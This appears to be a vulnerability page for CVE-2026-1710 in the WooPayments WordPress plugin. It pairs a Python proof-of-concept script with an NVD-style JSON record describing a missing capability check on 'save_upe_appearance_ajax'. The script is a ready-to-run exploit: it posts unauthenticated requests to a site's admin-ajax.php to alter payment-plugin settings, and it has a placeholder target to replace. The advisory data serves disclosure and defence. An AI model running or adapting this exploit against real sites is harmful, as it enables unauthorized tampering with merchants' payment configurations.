CVE-2026-1710

import requests def exploit_poc(target_url): """ PoC for CVE-2026-1710: Unauthorized modification of settings in WooPayments. """ # The endpoint for WordPress AJAX requests ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php" # Payload targeting the vulnerable function payload = { 'action': 'save_upe_appearance_ajax', 'is_button_enabled': 'false', # Malicious parameter to alter settings 'theme': 'dark' # Another potential setting } try: print(f"[*] Sending request to {ajax_url}...") response = requests.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check if settings were modified.") print(f"[+] Response body: {response.text[:200]}") else: print(f"[-] Server returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" exploit_poc(target)

{"cve": {"id": "CVE-2026-1710", "sourceIdentifier": "[email protected]", "published": "2026-03-31T05:16:10.690", "lastModified": "2026-04-24T18:11:16.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WooPayments: Integrated WooCommerce Payments plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_upe_appearance_ajax' function in all versions up to, and including, 10.5.1. This makes it possible for unauthenticated attackers to update plugin settings."}, {"lang": "es", "value": "El plugin WooPayments: Pagos Integrados de WooCommerce para WordPress es vulnerable a la modificación no autorizada de datos debido a una comprobación de capacidad faltante en la función 'save_upe_appearance_ajax' en todas las versiones hasta la 10.5.1, inclusive. Esto hace posible que atacantes no autenticados actualicen la configuración del plugin."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/woocommerce-payments/tags/10.4.0/includes/class-wc-payment-gateway-wcpay.php#L4125", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3480315/woocommerce-payments/trunk/includes/class-wc-payment-gateway-wcpay.php", "source": "[email protected]"}, {"url": "https://research.cleantalk.org/cve-2026-1710/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/cec13225-baa3-4f26-b2d2-af6106888c74?source=cve", "source": "[email protected]"}]}}